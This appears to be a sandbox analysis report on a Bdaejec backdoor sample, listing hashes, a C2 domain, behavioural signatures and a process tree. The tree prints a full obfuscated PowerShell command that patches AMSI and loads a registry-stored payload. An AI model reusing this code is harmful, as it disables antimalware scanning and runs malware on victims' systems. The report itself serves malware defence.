Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-11-2024 02:03

General

  • Target

    c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe

  • Size

    1013KB

  • MD5

    84138dffdbd652ba89baed49cc815b6a

  • SHA1

    841af40691b900f06217dc0b0af28d4fef0245a4

  • SHA256

    c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e

  • SHA512

    9aff34103afc917c1e1fbef62a4639a2a6249a295bc05e0fb812d1f64821e3929142a5b51c626aca66668bda9a05a08c8ea037c5b56c298eaf3e424916c20b1b

  • SSDEEP

    24576:BgVo+DZba0sLgKNCAZlcLMP8VoapQrUDz/JOop+mHDTOe51K:So+DKtCAZlzPYeUxO2hKez

Malware Config

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Bdaejec family
  • Detects Bdaejec Backdoor. 1 IoCs

    Bdaejec is backdoor written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 25 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 32 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 26 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 29 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 25 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 25 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{8c7edfd2-a4e5-41af-8edf-91f025b5b39a}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1184
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:668
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:956
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:440
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:928
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              1⤵
                PID:1076
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1092
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1108
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2744
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KdEwxYVDnpWT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JZhxlpDURoYORR,[Parameter(Position=1)][Type]$JuXdxXTaTy)$YCzGKVoIVUf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'Me'+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+'a'+''+'s'+''+'s'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+','+'A'+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+'t'+''+'o'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$YCzGKVoIVUf.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+'N'+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+'e'+'By'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$JZhxlpDURoYORR).SetImplementationFlags('Ru'+'n'+'t'+[Char](105)+'m'+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$YCzGKVoIVUf.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+'By'+'S'+'i'+[Char](103)+','+'N'+'e'+[Char](119)+'S'+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$JuXdxXTaTy,$JZhxlpDURoYORR).SetImplementationFlags(''+[Char](82)+''+'u'+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $YCzGKVoIVUf.CreateType();}$phJloYXxTIFUk=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+''+'U'+''+'n'+'sa'+'f'+''+[Char](101)+''+[Char](78)+'a'+'t'+'i'+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+''+'h'+''+[Char](111)+'d'+'s'+'');$WtjkcifhdSwNkG=$phJloYXxTIFUk.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+'d'+'r'+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+[Char](83)+'t'+[Char](97)+''+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TtWRDmNZXtinVHqCVBg=KdEwxYVDnpWT @([String])([IntPtr]);$JrMbzHyrVTPQrnGCwEZwlA=KdEwxYVDnpWT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BIIPFDHJULU=$phJloYXxTIFUk.GetMethod(''+[Char](71)+'e'+'t'+'M'+'o'+''+'d'+'u'+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'ne'+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+'l')));$NDvdOkgwhXCmJg=$WtjkcifhdSwNkG.Invoke($Null,@([Object]$BIIPFDHJULU,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+'i'+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$UwzAzAaCNMvsSnNUc=$WtjkcifhdSwNkG.Invoke($Null,@([Object]$BIIPFDHJULU,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+'l'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$BvvrjJC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NDvdOkgwhXCmJg,$TtWRDmNZXtinVHqCVBg).Invoke('am'+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+'l'+'');$kRbIEpScGmqPTFtjX=$WtjkcifhdSwNkG.Invoke($Null,@([Object]$BvvrjJC,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'S'+'c'+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'e'+[Char](114)+'')));$mUyKlkFWZr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UwzAzAaCNMvsSnNUc,$JrMbzHyrVTPQrnGCwEZwlA).Invoke($kRbIEpScGmqPTFtjX,[uint32]8,4,[ref]$mUyKlkFWZr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kRbIEpScGmqPTFtjX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UwzAzAaCNMvsSnNUc,$JrMbzHyrVTPQrnGCwEZwlA).Invoke($kRbIEpScGmqPTFtjX,[uint32]8,0x20,[ref]$mUyKlkFWZr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'T'+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](119)+''+[Char](119)+''+[Char](119)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Command and Scripting Interpreter: PowerShell
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2024
                    • C:\Users\Public\www.XClient.exe
                      C:\Users\Public\www.XClient.exe
                      2⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2448
                    • C:\Users\Public\www.XClient.exe
                      C:\Users\Public\www.XClient.exe
                      2⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:2812
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                    • Indicator Removal: Clear Windows Event Logs
                    PID:1140
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1272
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1292
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                        1⤵
                          PID:1368
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                          1⤵
                            PID:1448
                            • C:\Windows\system32\sihost.exe
                              sihost.exe
                              2⤵
                              • Modifies registry class
                              PID:2648
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1456
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1532
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1544
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                  1⤵
                                    PID:1656
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1680
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                      1⤵
                                        PID:1736
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                        1⤵
                                          PID:1792
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                          1⤵
                                            PID:1868
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                            1⤵
                                              PID:1972
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                              1⤵
                                                PID:2000
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:2008
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                  1⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1476
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:1016
                                                  • C:\Windows\System32\spoolsv.exe
                                                    C:\Windows\System32\spoolsv.exe
                                                    1⤵
                                                      PID:2088
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                      1⤵
                                                        PID:2200
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2372
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                          1⤵
                                                            PID:2480
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2488
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                              1⤵
                                                                PID:2664
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                1⤵
                                                                • Drops file in System32 directory
                                                                • Modifies data under HKEY_USERS
                                                                PID:2716
                                                              • C:\Windows\sysmon.exe
                                                                C:\Windows\sysmon.exe
                                                                1⤵
                                                                  PID:2772
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                  1⤵
                                                                  • Enumerates connected drives
                                                                  PID:2784
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                  1⤵
                                                                    PID:2816
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                    1⤵
                                                                      PID:2836
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                      1⤵
                                                                        PID:2912
                                                                      • C:\Windows\system32\wbem\unsecapp.exe
                                                                        C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                        1⤵
                                                                          PID:2896
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                          1⤵
                                                                            PID:3432
                                                                          • C:\Windows\Explorer.EXE
                                                                            C:\Windows\Explorer.EXE
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            • Suspicious use of UnmapMainImage
                                                                            PID:3460
                                                                            • C:\Users\Admin\AppData\Local\Temp\c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe"
                                                                              2⤵
                                                                              • Checks computer location settings
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:1968
                                                                              • C:\Users\Public\dControl.exe
                                                                                "C:\Users\Public\dControl.exe"
                                                                                3⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4656
                                                                                • C:\Users\Public\dControl.exe
                                                                                  C:\Users\Public\dControl.exe
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4024
                                                                                  • C:\Users\Public\dControl.exe
                                                                                    "C:\Users\Public\dControl.exe" /TI
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:3948
                                                                                    • C:\Windows\Explorer.exe
                                                                                      "C:\Windows\Explorer.exe" windowsdefender:
                                                                                      6⤵
                                                                                        PID:2144
                                                                                      • C:\Users\Public\dControl.exe
                                                                                        "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:2732
                                                                                      • C:\Windows\Explorer.exe
                                                                                        "C:\Windows\Explorer.exe" windowsdefender:
                                                                                        6⤵
                                                                                          PID:3204
                                                                                        • C:\Users\Public\dControl.exe
                                                                                          "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5008
                                                                                        • C:\Windows\Explorer.exe
                                                                                          "C:\Windows\Explorer.exe" windowsdefender:
                                                                                          6⤵
                                                                                            PID:1528
                                                                                          • C:\Users\Public\dControl.exe
                                                                                            "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1512
                                                                                          • C:\Windows\Explorer.exe
                                                                                            "C:\Windows\Explorer.exe" windowsdefender:
                                                                                            6⤵
                                                                                              PID:3304
                                                                                            • C:\Users\Public\dControl.exe
                                                                                              "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4276
                                                                                            • C:\Windows\Explorer.exe
                                                                                              "C:\Windows\Explorer.exe" windowsdefender:
                                                                                              6⤵
                                                                                                PID:4488
                                                                                              • C:\Users\Public\dControl.exe
                                                                                                "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4892
                                                                                              • C:\Windows\Explorer.exe
                                                                                                "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                6⤵
                                                                                                  PID:1504
                                                                                                • C:\Users\Public\dControl.exe
                                                                                                  "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1580
                                                                                                • C:\Windows\Explorer.exe
                                                                                                  "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                  6⤵
                                                                                                    PID:3052
                                                                                                  • C:\Users\Public\dControl.exe
                                                                                                    "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3056
                                                                                                  • C:\Windows\Explorer.exe
                                                                                                    "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                    6⤵
                                                                                                      PID:392
                                                                                                    • C:\Users\Public\dControl.exe
                                                                                                      "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4344
                                                                                                    • C:\Windows\Explorer.exe
                                                                                                      "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                      6⤵
                                                                                                        PID:3956
                                                                                                      • C:\Users\Public\dControl.exe
                                                                                                        "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3668
                                                                                                      • C:\Windows\Explorer.exe
                                                                                                        "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                        6⤵
                                                                                                          PID:5036
                                                                                                        • C:\Users\Public\dControl.exe
                                                                                                          "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:3144
                                                                                                        • C:\Windows\Explorer.exe
                                                                                                          "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                          6⤵
                                                                                                            PID:2036
                                                                                                          • C:\Users\Public\dControl.exe
                                                                                                            "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2296
                                                                                                          • C:\Windows\Explorer.exe
                                                                                                            "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                            6⤵
                                                                                                              PID:2824
                                                                                                            • C:\Users\Public\dControl.exe
                                                                                                              "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1384
                                                                                                            • C:\Windows\Explorer.exe
                                                                                                              "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                              6⤵
                                                                                                                PID:1808
                                                                                                              • C:\Users\Public\dControl.exe
                                                                                                                "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:2628
                                                                                                              • C:\Windows\Explorer.exe
                                                                                                                "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                6⤵
                                                                                                                  PID:3392
                                                                                                                • C:\Users\Public\dControl.exe
                                                                                                                  "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:1196
                                                                                                                • C:\Windows\Explorer.exe
                                                                                                                  "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                  6⤵
                                                                                                                    PID:4924
                                                                                                                  • C:\Users\Public\dControl.exe
                                                                                                                    "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5060
                                                                                                                  • C:\Windows\Explorer.exe
                                                                                                                    "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                    6⤵
                                                                                                                      PID:1404
                                                                                                                    • C:\Users\Public\dControl.exe
                                                                                                                      "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:4376
                                                                                                                    • C:\Windows\Explorer.exe
                                                                                                                      "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                      6⤵
                                                                                                                        PID:5108
                                                                                                                      • C:\Users\Public\dControl.exe
                                                                                                                        "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:2600
                                                                                                                      • C:\Windows\Explorer.exe
                                                                                                                        "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                        6⤵
                                                                                                                          PID:3140
                                                                                                                        • C:\Users\Public\dControl.exe
                                                                                                                          "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:3852
                                                                                                                        • C:\Windows\Explorer.exe
                                                                                                                          "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                          6⤵
                                                                                                                            PID:4416
                                                                                                                          • C:\Users\Public\dControl.exe
                                                                                                                            "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:4368
                                                                                                                          • C:\Windows\Explorer.exe
                                                                                                                            "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                            6⤵
                                                                                                                              PID:4312
                                                                                                                            • C:\Users\Public\dControl.exe
                                                                                                                              "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1852
                                                                                                                            • C:\Windows\Explorer.exe
                                                                                                                              "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                              6⤵
                                                                                                                                PID:1160
                                                                                                                              • C:\Users\Public\dControl.exe
                                                                                                                                "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:976
                                                                                                                              • C:\Windows\Explorer.exe
                                                                                                                                "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                                6⤵
                                                                                                                                  PID:3992
                                                                                                                                • C:\Users\Public\dControl.exe
                                                                                                                                  "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:4564
                                                                                                                                • C:\Windows\Explorer.exe
                                                                                                                                  "C:\Windows\Explorer.exe" windowsdefender:
                                                                                                                                  6⤵
                                                                                                                                    PID:2396
                                                                                                                                  • C:\Users\Public\dControl.exe
                                                                                                                                    "C:\Users\Public\dControl.exe" /EXP |3460|
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
